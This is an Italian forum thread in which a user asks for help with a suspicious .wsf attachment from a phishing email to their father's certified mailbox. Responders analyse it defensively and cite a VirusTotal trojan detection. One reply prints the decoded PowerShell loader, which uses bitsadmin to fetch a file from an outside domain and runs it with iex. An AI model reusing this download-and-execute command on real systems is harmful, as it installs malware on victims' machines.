Domanda Possibile malware dalla PEC

[0xbro]

Mmmm il codice sostanzilamente crea un link a powershell ed esegue uno script che sembra scaricare ed eseguire qualcosa:
Il codice powershell

powershell -c &""{
bitsadmin /transfer NkNZyTlr https://leonelmachava.com/leo/.../novo.rtf %programdata%\novo.rtf;
$mc=gc %programdata%\novo.rtf | Out-String; $mc |iex
}""

scarica utilizzando bitsadmin /transfer il contenuto di https://leonelmachava.com/leo/.../novo.rtf dentro %programdata%\novo.rtf, ne legge poi il contenuto (gc sta per Get-Content) e lo esegue utilizzando iex

La PEC arrivava da qualcuno di conosciuto oppure da un indirizzo mai visto prima?

Guardando dalla WaybackMachine il dominio leonelmachava.com risultava online l'ultima volta nel 2014, ed era un blog statico in wordpress:

Ora però non mi pare che sia ancora up, io personalmente non riesco a raggiungerlo

 

[Linux tux]

Virus total lo rileva come un trojan: https://www.virustotal.com/gui/file/3932ec0e8b445b9808d5b7bd773328773c65a2b8352b5b5b96d6febf8424a23c

 

[Dany_Glitch33]

Ciao a tutti, oggi alla PEC di mio padre è arrivata una mail contenente un file "documento-fiscale-(codice fiscale di mio padre).zip" con tre file "fiscale": ha detto che il pdf e il png risultavano impossibili da aprire, ma non il .wsf, che ha eseguito. Quando me l'ha detto ho pensato che si trattasse sicuramente di un malware, quindi l'ho aperto con Notepad e ho visto che è in Visual Basic. Però, fino all'aprire PowerShell, non ho capito la parte restante del codice. L'ho caricato qui sotto, così qualcuno di voi che conosce il linguaggio può capire cosa fa e scriverlo qui sotto, grazie.



P.S.: ho notato che molte scritte sono al contrario